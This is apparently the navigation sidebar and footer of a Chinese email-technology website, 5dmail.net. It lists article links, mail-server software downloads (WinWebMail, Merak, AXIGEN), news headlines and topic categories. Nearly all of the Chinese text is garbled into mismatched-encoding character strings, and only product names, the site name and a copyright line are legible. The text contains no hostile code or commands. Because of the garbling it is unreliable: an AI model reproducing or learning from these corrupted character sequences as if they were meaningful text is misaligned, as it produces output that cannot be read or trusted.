  • ÍøÂç¶Ë¿Ú¼°ÆäÏê½â
  • ͼ½âMcAfeeµÄʹÓ÷½·¨
  • ÍøÂ簲ȫ¼¼ÇÉ´óÈ«
  • ×ÔÓÉ¹ã¸æÇø
    ¡¡
     
    ×îÐÂÈí¼þÏÂÔØ
  • ORF Enterprise Edition 4.2 Õýʽ°æ
  • WinWebMail 3.7.7.3 ±ê×¼°æ
  • WinWebMail 3.7.7.3 ÆóÒµ°æ
  • BMailì÷ÓÊ
  • Merak Email Server for Windows 9.3.1..
  • Merak Email Server for Linux 9.3.1 ¼..
  • Merak Email Server 9.3.1 For Windwos..
  • AXIGEN Mail Server 6.1.1 for Windows
  • AXIGEN Mail Server 6.1.0 for Linux
  • ADModify.NETÏÂÔØ
  • symantec10.1»ù±¾°²×°¼°ÅäÖÃÊÓÆµ½Ì³Ì
  • Backup Exec System RecoveryÖ®±¸·ÝÊÓÆ..
  • ½ñÈÕÓʼþ¼¼ÊõÎÄÕÂ
  • ÃÀ´óѧÉúÇÖÈëÅåÁÖÖݳ¤¸öÈËÓʼþÕË»§±»´þ²¶
  • ˼¿ÆIronPort·¢²¼Ðµç×ÓÓʼþ°²È«É豸
  • Éî¸û"Èí¼þ+·þÎñ" ΢Èí300³ÇÊÐѲչî£ÓÊ
  • ´ÓºÚ¿Í³£Óù¥»÷Êֶο´WEBÓ¦Ó÷À»¤
  • ÏûÏ¢ÈËʿ͸¶ÑÅ»¢ÓëAOLºÏ²¢Ï¸½Ú½«ÓÚ±¾Ô..
  • ¹È¸èÌṩµÄµç×ÓÓʼþ´æµµÊ±¼äÑÓ³¤ÎªÊ®Äê
  • ÑÅ»¢½«ÔÚÓÊÏä·þÎñÖÐÕûºÏаæÔÚÏßÈÕÀú
  • 9ÔÂÀ¬»øÓʼþ×ÜÁ¿¼õÉÙ ÓëISPµ¹±ÕÓйØ
  • À¬»øÓʼþ·¢Õ¹µÄËÄ´óÇ÷ÊÆ
  • º«¹úÒéÔ±³ÆÖйúºÚ¿Íð³äÇàÍß̨·¢ËͲ¡¶¾..
  • VistaÄÑ³ÉÆøºò Windows XPÊÙÃü±»ÑÓ³¤
  • ÈüÃÅÌú¿ËÉý¼¶DLP²úÆ·¼°·´À¬»øÓʼþÍø¹Ø
  • ×îÐÂרÌâ
  • Sendmail ÓʼþϵͳÅäÖÃ
  • ×齨Exchange 2003Óʼþϵͳ
  • Windows Server 2008 רÌâ
  • ORF ·´À¬»øÓʼþϵͳ
  • Exchange Server 2007 רÌâ
  • ISA Server 2006 ½Ì³ÌרÌâ
  • Windows Vista ¼¼ÊõרÌâ
  • ¡°ºÚÝ®¡±£¨BlackBerry£©×¨Ìâ
  • ÒÆ¶¯µç×ÓÓʼþרÌâ
  • Apache James רÌâ
  • IMail Server ²Ù×÷Ö¸ÄÏ
  • ISA Server 2004 ʹÓÃרÌâ
  • ·ÖÀർº½
    ÓʼþÐÂÎÅ×ÊѶ:
    ITÒµ½ç | Óʼþ·þÎñÆ÷ | ÓʼþȤÎÅ | ÒÆ¶¯µçÓÊ
    µç×ÓÓÊÏä | ·´À¬»øÓʼþ|Óʼþ¿Í»§¶Ë|ÍøÂ簲ȫ
    ÐÐÒµÊý¾Ý | ÓʼþÈËÎï | ÍøÕ¾¹«¸æ | ÐÐÒµ·¨¹æ
    ÍøÂç¼¼Êõ:
    ÓʼþÔ­Àí | ÍøÂçЭÒé | ÍøÂç¹ÜÀí | ´«Êä½éÖÊ
    Ïß·½ÓÈë | ·ÓÉ½Ó¿Ú | Óʼþ´æ´¢ | »ªÎª3Com
    CISCO¼¼Êõ | ÍøÂçÓë·þÎñÆ÷Ó²¼þ
    ²Ù×÷ϵͳ:
    Windows 9X | Linux&Uinx | Windows NT
    Windows Vista | FreeBSD | ÆäËü²Ù×÷ϵͳ
    Óʼþ·þÎñÆ÷:
    ³ÌÐòÓ뿪·¢ | Exchange | Qmail | Postfix
    Sendmail | MDaemon | Domino | Foxmail
    KerioMail | JavaMail | Winwebmail |James
    Merak&VisNetic | CMailServer | WinMail
    ½ðµÑÓʼþϵͳ | ÆäËü |
    ·´À¬»øÓʼþ:
    ×ÛÊö| ¿Í»§¶Ë·´À¬»øÓʼþ|·þÎñÆ÷¶Ë·´À¬»øÓʼþ
    Óʼþ¿Í»§¶ËÈí¼þ:
    Outlook | Foxmail | DreamMail| KooMail
    The bat | À×Äñ | Eudora |Becky! |Pegasus
    IncrediMail |ÆäËü
    µç×ÓÓÊÏä: ¸öÈËÓÊÏä | ÆóÒµÓÊÏä |Gmail
    ÒÆ¶¯µç×ÓÓʼþ:·þÎñÆ÷ | ¿Í»§¶Ë | ¼¼ÊõÇ°ÑØ
    ÓʼþÍøÂ簲ȫ:
    Èí¼þ©¶´ | °²È«ÖªÊ¶ | ²¡¶¾¹«¸æ |·À»ðǽ
    ¹¥·À¼¼Êõ | ²¡¶¾²éɱ| ISA | Êý×ÖÇ©Ãû
    ÓʼþÓªÏú:
    EmailÓªÏú | ÍøÂçÓªÏú | ÓªÏú¼¼ÇÉ |ÓªÏú°¸Àý
    ÓʼþÈ˲Å:ÕÐÆ¸ | Ö°³¡ | Åàѵ | Ö¸ÄÏ | Ö°³¡
    ½â¾ö·½°¸:
    Óʼþϵͳ|·´À¬»øÓʼþ |°²È« |ÒÆ¶¯µçÓÊ |Õбê
    ²úÆ·ÆÀ²â:
    Óʼþϵͳ |·´À¬»øÓʼþ |ÓÊÏä |°²È« |¿Í»§¶Ë
    ¹ã¸æÁªÏµ | ºÏ×÷ÁªÏµ | ¹ØÓÚÎÒÃÇ | ÁªÏµÎÒÃÇ | ·±ówÖÐÎÄ
    °æÈ¨ËùÓУºÓʼþ¼¼Êõ×ÊÑ¶Íø©2003-2007 www.5dmail.net, All Rights Reserved
    www.5Dmail.net Web Team   ÔÁICP±¸05009143ºÅ